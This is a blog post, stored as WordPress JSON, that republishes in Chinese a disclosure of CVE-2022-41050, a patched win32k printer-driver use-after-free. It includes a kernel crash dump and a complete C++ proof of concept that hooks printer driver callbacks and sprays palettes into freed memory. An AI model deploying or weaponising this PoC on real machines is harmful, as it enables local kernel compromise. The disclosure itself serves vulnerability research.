{"id":990,"date":"2022-12-15T22:27:28","date_gmt":"2022-12-15T14:27:28","guid":{"rendered":"http:\/\/www.aqwu.net\/wp\/?p=990"},"modified":"2022-12-15T22:27:28","modified_gmt":"2022-12-15T14:27:28","slug":"win32k-%e7%94%a8%e6%88%b7%e6%a8%a1%e5%bc%8f%e6%89%93%e5%8d%b0%e6%9c%ba%e9%a9%b1%e5%8a%a8%e7%a8%8b%e5%ba%8f%e5%90%af%e5%8a%a8%e6%96%87%e6%a1%a3-uaf","status":"publish","type":"post","link":"https:\/\/www.aqwu.net\/wp\/?p=990","title":{"rendered":"WIN32K \u7528\u6237\u6a21\u5f0f\u6253\u5370\u673a\u9a71\u52a8\u7a0b\u5e8f\u542f\u52a8\u6587\u6863 UAF"},"content":{"rendered":"\n

\u603b\u7ed3<\/strong><\/p>\n\n\n\n

UMPD\uff08\u7528\u6237\u6a21\u5f0f\u6253\u5370\u673a\u9a71\u52a8\u7a0b\u5e8f\uff09\u4e2d\u5b58\u5728\u4e00\u4e2a\u6f0f\u6d1e\uff0c\u5141\u8bb8\u672c\u5730\u7528\u6237\u89e6\u53d1\u91ca\u653e\u540e\u4f7f\u7528\u6f0f\u6d1e\u3002\u8be5\u6f0f\u6d1e\u9002\u7528\u4e8eWindows 8\u53ca\u66f4\u9ad8\u7248\u672c\uff0c\u5e76\u4e14\u5728\u8f83\u65e7\u7684Windows\u8ba1\u7b97\u673a\u4e0a\u5f88\u5bb9\u6613\u88ab\u5229\u7528\u3002<\/p>\n\n\n\n

\u539f\u6587\u94fe\u63a5\uff1ahttps:\/\/ssd-disclosure.com\/win32k-user-mode-printer-drivers-startdoc-uaf\/<\/p>\n\n\n\n

Credit<\/strong><\/p>\n\n\n\n

\u4ece\u4e8b SSD \u5b89\u5168\u62ab\u9732\u5de5\u4f5c\u7684\u72ec\u7acb\u5b89\u5168\u7814\u7a76\u4eba\u5458\u3002<\/p>\n\n\n\n

CVE<\/strong><\/p>\n\n\n\n

CVE-2022-41050<\/p>\n\n\n\n

\u4f9b\u5e94\u5546\u54cd\u5e94<\/strong><\/p>\n\n\n\n

\u4f9b\u5e94\u5546\u5df2\u5728\u4ee5\u4e0b\u4f4d\u7f6e\u53d1\u5e03\u4e86\u53ef\u7528\u7684\u4fee\u8865\u7a0b\u5e8f\uff1a https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2022-41050<\/a><\/p>\n\n\n\n

\u6280\u672f\u5206\u6790<\/strong><\/p>\n\n\n\n

BoundClipRGNToSurface \u5408\u5e76\u8868\u9762\u7684\u65b9\u5f0f\u4e2d\u5b58\u5728\u4e00\u4e2a\u6f0f\u6d1e\uff0c\u4f7f\u5f97\u653b\u51fb\u8005\u80fd\u591f\u5728\u91ca\u653e\u540e\u89e6\u53d1\u4f7f\u7528\uff0c\u56e0\u4e3a\u8be5\u529f\u80fd\u4f1a\u91ca\u653e\u4f7f\u7528\u7684\u6570\u636e\uff0c\u7136\u540e\u8bbf\u95ee\u5b83\u3002\u5982\u679c\u91ca\u653e\u7684\u5185\u5b58\u5df2\u6b63\u786e\u51c6\u5907\uff0c\u5219\u653b\u51fb\u8005\u53ef\u4ee5\u63a7\u5236\u5d29\u6e83\u5e76\u4f7f\u5176\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002<\/p>\n\n\n\n

\u8981\u89e6\u53d1\u6f0f\u6d1e\uff0c\u8bf7\u542f\u7528 Windows 11 \u7684\u7279\u6b8a\u6c60\u5e76\u542f\u52a8 PoC\uff0c\u5c06\u663e\u793a\u4ee5\u4e0b\u5d29\u6e83\u4fe1\u606f\uff1a<\/p>\n\n\n\n

CONTEXT:  ffff808ee1ffd8a0 -- (.cxr 0xffff808ee1ffd8a0)\nrax=ffff82b24d980f90 rbx=ffff808ee1ffe500 rcx=ffff808ee1ffe440\nrdx=ffff82b253fd2f90 rsi=ffff808ee1ffe848 rdi=ffff808ee1ffe4f8\nrip=ffff829502061123 rsp=ffff808ee1ffe2c0 rbp=ffff808ee1ffe440\n r8=ffff808ee1ffe450  r9=ffff82b253fd4f08 r10=414141414141413d\nr11=0000000000000000 r12=0000000000000000 r13=ffff808ee1ffe9a8\nr14=ffff82b253fd4f90 r15=4141414141414141\niopl=0         nv up ei pl nz ac pe nc\ncs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00050212\nwin32kbase!RGNOBJ::bMerge+0x43:\nffff8295`02061123 418b02          mov     eax,dword ptr [r10] ds:002b:41414141`4141413d=????????\nResetting default scope\n\nPROCESS_NAME:  poc-bound.exe\n\nSTACK_TEXT:  \nffff808e`e1ffe2c0 ffff8295`032dcc4b     : ffff808e`e1ffe440 ffff808e`e1ffe848 ffff808e`e1ffe450 ffff808e`e1ffe408 : win32kbase!RGNOBJ::bMerge+0x43\nffff808e`e1ffe410 ffff8295`032492d1     : ffff82b2`4d966ce8 00000000`00000000 ffff808e`e1ffea30 ffff808e`e1ffea30 : win32kfull!BOUNDCLIPRGNTOSURFACE::BOUNDCLIPRGNTOSURFACE+0x9385f\nffff808e`e1ffe4a0 ffff8295`0324a97e     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : win32kfull!EngStrokePath+0x61\nffff808e`e1ffe610 ffff8295`0324b05e     : 00000000`00000d0d 00000000`1000a01f ffff808e`e1ffe780 00000000`00000001 : win32kfull!EPATHOBJ::bSimpleStroke+0x18a\nffff808e`e1ffe6f0 ffff8295`0324e5e1     : 00000000`00000001 00000000`00000001 00000000`00000000 00000000`00000000 : win32kfull!EPATHOBJ::bStrokeAndOrFill+0x596\nffff808e`e1ffe910 ffff8295`0324df38     : 00000000`14210982 00000000`00000014 ffff808e`00000387 00000000`14210982 : win32kfull!GreLineTo+0x661\nffff808e`e1ffed40 ffff8295`024bd54a     : 00000000`0000000e 00000000`0000025f 00000000`000003f8 ffffe784`60c40080 : win32kfull!NtGdiLineTo+0x68\nffff808e`e1ffedf0 fffff801`6b02f075     : 0000016b`f3d70680 0000016b`f6030000 0000003f`49daebd7 ffffe784`60d77080 : win32k!NtGdiLineTo+0x16\nffff808e`e1ffee20 00007ffb`148d1b14     : 00007ffb`13f72339 00007ffb`16acd240 0000016b`f3d71580 00000000`00000387 : nt!KiSystemServiceCopyEnd+0x25\n0000003e`c9dae188 00007ffb`13f72339     : 00007ffb`16acd240 0000016b`f3d71580 00000000`00000387 00000000`00000000 : win32u!NtGdiLineTo+0x14\n0000003e`c9dae190 00007ffb`14da4d37     : 0000016b`f3d73790 00000000`14210982 00000000`00000001 00000000`00000000 : gdi32full!LineToImpl+0x49\n0000003e`c9dae1c0 00007ff7`7c29104c     : 0000003e`c9daebd8 0000003e`c9dae320 00000000`000003f8 00000000`0049414e : GDI32!LineTo+0x37\n0000003e`c9dae1f0 00007ffb`13f7ccbe     : 0000003e`c9daebd8 0000016b`f57ba120 00000000`00000023 00007ffa`ddc50d68 : poc_bound!hook_DrvStrokePath+0x4c [F:\\research\\win32k\\bugs\\poc-bound\\poc-bound\\poc-bound.cpp @ 111] \n0000003e`c9dae230 00007ffb`157910be     : 0000016b`00000001 00007ffb`00000000 0000003e`c9daebd8 0000016b`f57b0150 : gdi32full!GdiPrinterThunk+0x177e\n0000003e`c9dae300 00007ffb`16b07e04     : 00000000`00000010 0000016b`f5802720 00000000`00000011 00007ffa`ddc4f998 : USER32!__ClientPrinterThunk+0x3e\n0000003e`c9daeb80 00007ffb`148d1b14     : 00007ffb`13f72339 0000016b`f57ba170 00007ffa`ddbbbeb3 00000000`00000258 : ntdll!KiUserCallbackDispatcherContinue\n0000003e`c9daec38 00007ffb`13f72339     : 0000016b`f57ba170 00007ffa`ddbbbeb3 00000000`00000258 00000000`00000258 : win32u!NtGdiLineTo+0x14\n0000003e`c9daec40 00007ffb`14da4d37     : 00007ffa`ddc48ce0 00000000`14210982 00000000`00000001 00000000`00000000 : gdi32full!LineToImpl+0x49\n0000003e`c9daec70 00007ff7`7c291146     : 0000003e`c9daf678 0000003e`c9daedc0 0000016b`f3d73790 0000003e`0049414e : GDI32!LineTo+0x37\n0000003e`c9daeca0 00007ffb`13f7c55e     : 0000003e`c9daf678 00007ffb`13f7c42a 00001b68`00001361 0000003e`c9daf688 : poc_bound!hook_DrvStartDoc+0x16 [F:\\research\\win32k\\bugs\\poc-bound\\poc-bound\\poc-bound.cpp @ 115] \n0000003e`c9daecd0 00007ffb`157910be     : 00000000`00000001 00007ffb`00000000 0000003e`c9daf678 00007ffb`00000000 : gdi32full!GdiPrinterThunk+0x101e\n0000003e`c9daeda0 00007ffb`16b07e04     : 00000000`00000000 00007ffb`16b07e04 00007ff7`7c293330 0000016b`f3d9e3f0 : USER32!__ClientPrinterThunk+0x3e\n0000003e`c9daf620 00007ffb`148d7694     : 00007ffb`13faff32 00000000`00000000 00000000`00000000 00000000`14210982 : ntdll!KiUserCallbackDispatcherContinue\n0000003e`c9daf6a8 00007ffb`13faff32     : 00000000`00000000 00000000`00000000 00000000`14210982 00000000`00000003 : win32u!NtGdiStartDoc+0x14\n0000003e`c9daf6b0 00007ffb`14dae2c2     : 0000016b`f3da2601 00000000`00000001 0000003e`c9daf8f0 00000000`00000000 : gdi32full!StartDocWImpl+0x5b2\n0000003e`c9daf870 00007ff7`7c291301     : 0000016b`f3d55db0 00000000`00000000 00000000`0049414e 00000000`00000000 : GDI32!StartDocW+0x32\n0000003e`c9daf8a0 00007ff7`7c291540     : 00000000`00000000 00007ff7`7c2915b9 00000000`00000000 00000000`00000000 : poc_bound!main+0x1b1 [F:\\research\\win32k\\bugs\\poc-bound\\poc-bound\\poc-bound.cpp @ 130] \n0000003e`c9daf940 00007ffb`149154e0     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : poc_bound!__scrt_common_main_seh+0x10c [d:\\a01\\_work\\43\\s\\src\\vctools\\crt\\vcstartup\\src\\startup\\exe_common.inl @ 288] \n0000003e`c9daf980 00007ffb`16a6485b     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x10\n0000003e`c9daf9b0 00000000`00000000     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x2b<\/code><\/pre>\n\n\n\n
PoC<\/strong><\/p>\n\n\n\n
#include <stdlib.h>  \n#include <stdio.h>  \n#include <limits.h>  \n#include <iostream>\n#include <windows.h>\n#include <vector>\n#include <winddi.h>\n#include <winternl.h>\n\n#define PRINTER_NAME L\"Microsoft XPS Document Writer\"\n\ntypedef BOOL(*DrvEnableDriver_t)(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA* pded);\n\nHMODULE LoadPrinterDll()\n{\n    HANDLE hPrinter = NULL;\n\n    \/\/ Open printer\n    if (!OpenPrinterW((LPWSTR)PRINTER_NAME, &hPrinter, NULL))\n    {\n        puts(\"[-] Failed to open printer\");\n        return NULL;\n    }\n\n    \/\/ Get the printer driver\n    DWORD pcbNeeded;\n    GetPrinterDriverW(hPrinter, NULL, 2, NULL, 0, &pcbNeeded);\n\n    DRIVER_INFO_2W* driverInfo = (DRIVER_INFO_2W*)malloc(pcbNeeded);\n    if (!GetPrinterDriverW(hPrinter, NULL, 2, (LPBYTE)driverInfo, pcbNeeded, &pcbNeeded))\n    {\n        return NULL;\n    }\n\n    \/\/ Load the printer driver into memory\n    return LoadLibraryExW(driverInfo->pDriverPath, NULL, LOAD_WITH_ALTERED_SEARCH_PATH);\n\n}\n\n\nHPALETTE createpalette_primitive(SHORT chunk_size) {\n    WORD palette_entries_count, palette_size;\n    LOGPALETTE* palette;\n\n    palette_entries_count = (chunk_size - 0x90) \/ 4;\n    palette_size = sizeof(LOGPALETTE) + (palette_entries_count - 1) * sizeof(PALETTEENTRY);\n    palette = (LOGPALETTE*)malloc(palette_size);\n\n    memset(palette, 0x41, palette_size);\n    \n    palette->palNumEntries = palette_entries_count;\n    palette->palVersion = 0x300;\n\n    return CreatePalette(palette);\n}\n\n\nVOID spray(UINT _chunk_size, UINT count) {\n    for (UINT i = 0; i < count; i++) {\n        createpalette_primitive(_chunk_size);\n    }\n}\n\n\nBOOL hook_DrvStrokePath(SURFOBJ* pso, PATHOBJ* ppo, CLIPOBJ* pco, XFORMOBJ* pxo, BRUSHOBJ* pbo, POINTL* pptlBrushOrg, LINEATTRS* plineattrs, MIX       mix);\nBOOL hook_DrvStartDoc(SURFOBJ* pso, LPWSTR  pwszDocName, DWORD   dwJobId);\n\nvoid Setup_UmpdHook() {\n    HMODULE hPrinter = LoadPrinterDll();\n    DrvEnableDriver_t DrvEnableDriver = (DrvEnableDriver_t)GetProcAddress(hPrinter, \"DrvEnableDriver\");\n\n    DRVENABLEDATA ded;\n    DrvEnableDriver(DDI_DRIVER_VERSION_NT4, sizeof(ded), &ded);\n\n    DWORD lpOldProtect;\n    VirtualProtect(ded.pdrvfn, ded.c * sizeof(PFN), PAGE_READWRITE, &lpOldProtect);\n\n    for (int i = 0; i < ded.c; i++) {\n        if (ded.pdrvfn[i].iFunc == INDEX_DrvStrokePath) {\n            ded.pdrvfn[i].pfn = (PFN)hook_DrvStrokePath;\n        }\n        else if (ded.pdrvfn[i].iFunc == INDEX_DrvStartDoc) {\n            ded.pdrvfn[i].pfn = (PFN)hook_DrvStartDoc;\n        }\n    }\n}\n\n\n\/\/=====================\n\/\/ Umpd Hooks\n\/\/=====================\nHDC hdc = 0;\n\nint hook_DrvStrokePath_count = 0;\nBOOL hook_DrvStrokePath(SURFOBJ* pso, PATHOBJ* ppo, CLIPOBJ* pco, XFORMOBJ* pxo, BRUSHOBJ* pbo, POINTL* pptlBrushOrg, LINEATTRS* plineattrs, MIX       mix) {\n    hook_DrvStrokePath_count++;\n    if (hook_DrvStrokePath_count == 1) {\n        ExcludeClipRect(hdc, 0x25f, 0x3f8, 0x1, 0x387);\n        LineTo(hdc, 0, 0);\n    }\n    else if (hook_DrvStrokePath_count == 2) {\n        ExcludeClipRect(hdc, 0x10a, 0x2d2, 0x243, 0x217);\n        Ellipse(hdc, 0x15a, 0x3a1, 0x29, 0x10a);\n        \n        spray(0x120, 0x1000);   \/\/ Fill the Freed Region with 0x41414141\n    }\n\n    return FALSE;       \/\/ SHOULD RETURN FALSE\n}\n\nBOOL hook_DrvStartDoc(SURFOBJ* pso, LPWSTR  pwszDocName, DWORD   dwJobId) {\n    LineTo(hdc, 0, 0);          \/\/ -> causes hook_DrvStrokePath to be called\n    return TRUE;\n}\n\nint main(int argc, char **argv)\n{\n    Setup_UmpdHook();\n    \n    hdc = CreateDC(NULL, PRINTER_NAME, NULL, NULL);\n    DOCINFO di;\n    ZeroMemory(&di, sizeof(di));\n    di.cbSize = sizeof(di);\n    di.lpszDocName = L\"Test\";\n    di.lpszOutput = L\"Test.xps\";\n    StartDoc(hdc, &di);\n\n    return 0;\n}\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
\u603b\u7ed3 UMPD\uff08\u7528\u6237\u6a21\u5f0f\u6253\u5370\u673a\u9a71\u52a8\u7a0b\u5e8f\uff09\u4e2d\u5b58\u5728\u4e00\u4e2a\u6f0f\u6d1e\uff0c\u5141\u8bb8\u672c\u5730\u7528\u6237\u89e6\u53d1\u91ca\u653e\u540e\u4f7f\u7528\u6f0f\u6d1e\u3002\u8be5\u6f0f\u6d1e\u9002\u7528\u4e8eWindo […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[102,37,43],"tags":[227,228,229],"class_list":["post-990","post","type-post","status-publish","format-standard","hentry","category-windows-infoarticle","category-samples","category-infoarticle","tag-umpd","tag-win32k","tag-229"],"views":2144,"jetpack_sharing_enabled":true,"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=\/wp\/v2\/posts\/990","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=990"}],"version-history":[{"count":1,"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=\/wp\/v2\/posts\/990\/revisions"}],"predecessor-version":[{"id":991,"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=\/wp\/v2\/posts\/990\/revisions\/991"}],"wp:attachment":[{"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=990"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=990"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.aqwu.net\/wp\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=990"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}